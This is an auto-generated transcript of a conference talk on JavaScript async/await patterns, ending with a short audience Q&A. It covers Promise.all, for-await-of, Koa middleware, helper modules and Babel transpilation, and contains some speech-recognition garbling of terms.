kind of a mechanism is working and suppose you have two async functions right you kind of await for it rather you could use promise dot all and say await await of promise dot all and you to us in functions whatever it responds a returns would be R1 and R2 so there is all there is also a proposal for await all which kind of got rejected and at the very beginning when the proposal was there there was this proposal called await star which was doing this but even that's not there and in the in the previous talk also we saw this I think that waterfall being used a lot right now if you were to rewrite async dot waterfall async dot series with async await how do you do that on the left you have waterfall where you have await await async function one the results of that is in R1 and then you have await async function to result of that R1 is passed to this so you'll get the result of R2 so it's behaving more like a waterfall on the right you have the series which is pretty simple you can return an array of awaits and if you have an async in async iterator you can use you can you can iterate it with an await this is because you can't do an await of for each right it is not it is not like asynchronous where you could use await and wait for things to get resolved or whatever processes you are doing that's where you have to use this loop called for await off and if you have an iterable in this example is just a simple iterator where it kind of returns and results to promises and you can await for each of them and log it out so the other example is where instead of you using promise dot all always you can have an all higher order function where you pass in the parameters and do promise dot all there if you want individual you can just pass like P1 P2 all your promises or you can just spread it out and send all the request and get it back to an array and also you can use await on any thenable function as in this case you're seeing it's just an object which has then the blabber loop is like resolve and reject you can just await on that and it just console logs 42 so it need not be a promise it can be any thenable function so if you have a class which has thenable in it you can easily wrap it in an async function and await for it and if you are if you are using express and if you want a middleware which has async of it you have to be you have to do bit of a circus where you have to wrap your middlewares with an with a promise which kind of resolves that function so basically pass your middleware to that it's kind of it kind of wraps it with the promise and send it over rather there is this project that I was talking about when TJ was interested on Kova.js which basically started with the generators and now it has async of it as you can see the pointer moves every time there is a next await next it goes to the next chain middleware automatically so you need not wrap your middlewares just use await it's it's a very lightweight module you could you could try using it and the pain part if you have absorbed is you have to wrap all of your awaits if it is throwing with a trycatch right or you are there is or you could say promise dot something and then do it dot catch again but isn't it painful to have a trycatch block everywhere where your await might throw so here is a wonderful module called await to JS you just require it to as to and say await to of promise dot resolve which kind of gives you error and result a race right? So it's pretty straightforward. You can do as many awaits you want without putting it in a trycatch block and there is other fantastic module called proximize. So instead of you writing food or then then then chaining all the dense or instead of having await await awaits you could proximize your foo and then say bar bars cues and you will get the value directly. But it is like a simple chaining. It's almost like you're accessing your object properties right? So proximize is one such wonderful tool and if you want to know more such modules you can subscribe to my know more you love the week. So another final gotcha the couple of minutes of gotchas like so you might be wondering if I want to use a sink away today most of you would probably run it through Babel or something right what happens when it transpiles you have a while one right? It is using regenerators and there's a while one running because the browser has not implemented it and it has no other go but rather to implement a state machine in itself and the loop keeps running. So to mitigate this there is this wonderful plugin called it's experimental I think the PR is approved but not yet merged. It says like but you can still use it. It's Babel plugin async to promise. If you see here on the left you have your async function on the left on the right is the transpiled data right? So it looks as good as having promises unlike compared to the previous one you had a while one with regenerators and things. The other thing the the VA team is working on is when there's an error they've made it better today as of today on node soon to know where exactly the error happened previously. If there is an error that was thrown it would it would just say d8 1 colon 44 and you have to figure out where the error was thrown but now it's improved and it says like async promise all and that's where exactly the error got thrown right? And Benedict posted this last night. It's it's the benchmarks for you know async await and parallel promises so you can you can see it for yourself on version 8.72. That's how fast it is. If you are not into real micro level optimization this is perfectly good to use. And here is the last fun thing that you can do if you are if you are on VS code you could enable this by enabling the even for type script and for JavaScript you could convert a block of code which uses promise to a sink of it. You saw that? Yeah, so you can just highlight the block refactor it all your promises one shot into a sink of it. You could probably get bonus points using this plugin and say like hey I wrote the entire project with a sink of it like kudos to me. And support on browsers. These are the supports and browser. And if you're on node you're like really good if you're you're like good if you're on seven and above eight you're really good if you're on 12 you're like a hundred percent like all the sink of it features are there. That's it. You can tweet me on new month. Catch me on incident.com. Hope you liked it. Thank you guys. We can take some questions without a time but maybe a couple of them. Sorry for one announcement. Tomorrow make sure you get your badges because they're not going to be reprinted. So get those and also the feedback form that have been given to you. Can you drop them? There's a box outside. They're laid out in trays near the alleys over here and there. Please pick up one on your way. And we really appreciate your feedback. Let's keep the questions. Hey, hey. Lovely presentation. Thank you. So my question is you said that Coa started off with generators and then sort of went back or settled on a sink of it. So in your general work in a day to day work, what is your your comparison between generators and a sink of it? For example, if you're using Redux Saga, it's very much uses generators today, right? So do you see generators as the next step or kind of a too much of a step? It would be more like a parallel track. It's not like a next step because both of them are like side by side. It's on your description whether you're taking for generators like you could do an yield star with generator, but you can't do an like await all or await star. It doesn't make sense, right? So if you're using a lot of iterators and you have to do a lot of next calls, generator would be a good use case. Like for example, I wrote this blog post where I'm traversing trees with generators, which is a simple thing, but we generated it. It looks even more intuitive to traverse a tree. So if your use case involves something where generator is beneficial, it is better to use. But I think of it as a way to go. It's kind of it went through a lot of churning and it's kind of complete. Now there's like nothing much to add or remove from it. So I think it is a safe bet. Thanks. Amen. So when you talked about await all, which basically just wraps a promise dot all. What benefit do I get out of that? Like if I had multiple promises and I passed promises to a promise dot all and I wrapped that same thing to an await all, what benefit do I get out of that? No, rather than having a promise dot all everywhere, I thought it's a pattern to just have an all there at the beginning and then you could pass individual promises or set of promises and then spread it out. Okay. Yeah, kind of makes sense. Thank you guys.